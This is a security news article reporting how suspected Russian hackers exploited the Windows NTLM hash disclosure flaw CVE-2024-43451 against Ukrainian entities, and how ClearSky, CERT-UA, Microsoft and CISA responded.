In a concerning development, suspected Russian hackers have been identified exploiting a recently patched vulnerability in Windows, specifically a zero-day flaw that poses significant risks to Ukrainian entities. This security issue, designated as CVE-2024-43451, is classified as an NTLM Hash Disclosure spoofing vulnerability. It was brought to light by ClearSky security researchers, who highlighted its potential for misuse in cyberattacks.
Details of the Vulnerability
The vulnerability allows attackers to steal a logged-in user’s NTLMv2 hash by manipulating connections to a server under their control. ClearSky first detected this malicious campaign in June, noting the use of phishing emails designed to exploit the flaw. These emails contained links that, when clicked, would download an Internet shortcut file from a previously compromised server associated with the Kamianets-Podilskyi City Council’s Department of Education and Science.
According to ClearSky, the vulnerability is triggered when users interact with the URL file—whether by right-clicking, deleting, or moving it. This interaction establishes a connection to a remote server, enabling the download of various malware payloads, including SparkRAT, an open-source remote access tool that grants attackers control over compromised systems.
During their investigation, researchers also noted attempts to capture NTLM hashes through the Server Message Block (SMB) protocol. Such password hashes can be exploited in “pass-the-hash” attacks or cracked to reveal users’ plaintext passwords.
ClearSky promptly shared their findings with Ukraine’s Computer Emergency Response Team (CERT-UA), which linked these attacks to a threat group known as UAC-0194, believed to have Russian affiliations.
In response to these revelations, Microsoft acted swiftly, patching the vulnerability during the November 2024 Patch Tuesday. The tech giant confirmed ClearSky’s assessments, emphasizing that user interaction is essential for the successful exploitation of this vulnerability. Microsoft’s advisory stated, “This vulnerability discloses a user’s NTLMv2 hash to the attacker who could use this to authenticate as the user.” They further clarified that even minimal interaction with a malicious file—such as selecting, inspecting, or performing any action other than opening or executing—could trigger the vulnerability.
CVE-2024-43451 impacts all supported versions of Windows, including Windows 10 and later, as well as Windows Server 2008 and newer. In a related move, the Cybersecurity and Infrastructure Security Agency (CISA) added this vulnerability to its Known Exploited Vulnerabilities Catalog, mandating that organizations secure affected systems by December 3, as outlined in Binding Operational Directive (BOD) 22-01. CISA cautioned that such vulnerabilities are common attack vectors for malicious cyber actors and pose considerable risks to federal enterprises.
